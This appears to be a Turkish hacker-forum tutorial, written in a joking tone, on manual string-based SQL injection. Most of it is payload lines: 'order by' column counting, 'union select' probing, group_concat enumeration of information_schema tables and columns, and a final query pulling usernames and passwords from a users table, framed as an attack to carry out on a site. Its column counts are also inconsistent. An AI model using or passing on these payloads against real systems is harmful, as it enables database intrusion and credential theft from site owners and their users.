Ya Gençler Buda Farklı Bir Sql Çeşiti Bunlara Ömür Yetmez Amma Velakin Black-Shadow Sizler İçin Anlatacak Örneksiz Konu Anlatımı Olmaz Hemmen Örnek Verecek Olursak Lan Bakıyorsunuz Manuel Sql Yaparken İlk Kullandıgımız Komut Olan Order yani (Sırala) Komutunu Yazalım
Neyse Gençler Kafanıza Takmayın Black-Shadow kardeşiniz Diyor ki bu String Based Sql İnj Diyerek Yola Devam Ediyor 1 Dakika Sigarayı Yakayım
Arkadaşalar Biraz Kafam Dağınıktı Yanlış Olduysa Kusura Bakmayın Ama Doğru Olması Gerekir.
Kod:
order by 31-- Yazdık Alla Alla Site Değişmedi Dur Bakalım Aşşağıda 1 Örnek Daha Yazalım
Kod:
order by 3152-- Lan Gene Aynı Tövbe Tövbe Sinir Oldum Bak Şimdi
Kod:
id=12’ order by 1--+- şeklinde kolon sayılarını buluyoruz.Kolonlarımızın 8 Oldugunu Düşünüyorsunuz Ve Devam Ediyoruz
Kod:
id=12’ union select 1,2,3,4,5,6,7,8--+- şeklinde union select çektik.Karşımıza 3,4 sayılarının Kocceman Görüyoruz :D
Kod:
id=12’ union select 3,4,group_concat(table_name),5,6,7 from information_schema.tables where table_schema=database()--+- şeklinde Tablolarımızı Gördük Oh Ne Güzel La :D
Kod:
id=12’ union select 3,4,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x7573657273--+-
Kod:
kolonlarımızı çekiyoruz.Yukarıdaki 0x ile başlayan yer users tablosunun hexlenmiş hali.
Kod:
id=12 union select 3,4,username,password,5,6 from users--+-
Kod:
Şeklinde Kullanıcıadı(username),şifre(password) Aldık Hayırlı Uğurlu Olsun Basın Gitsin Ortağım :)
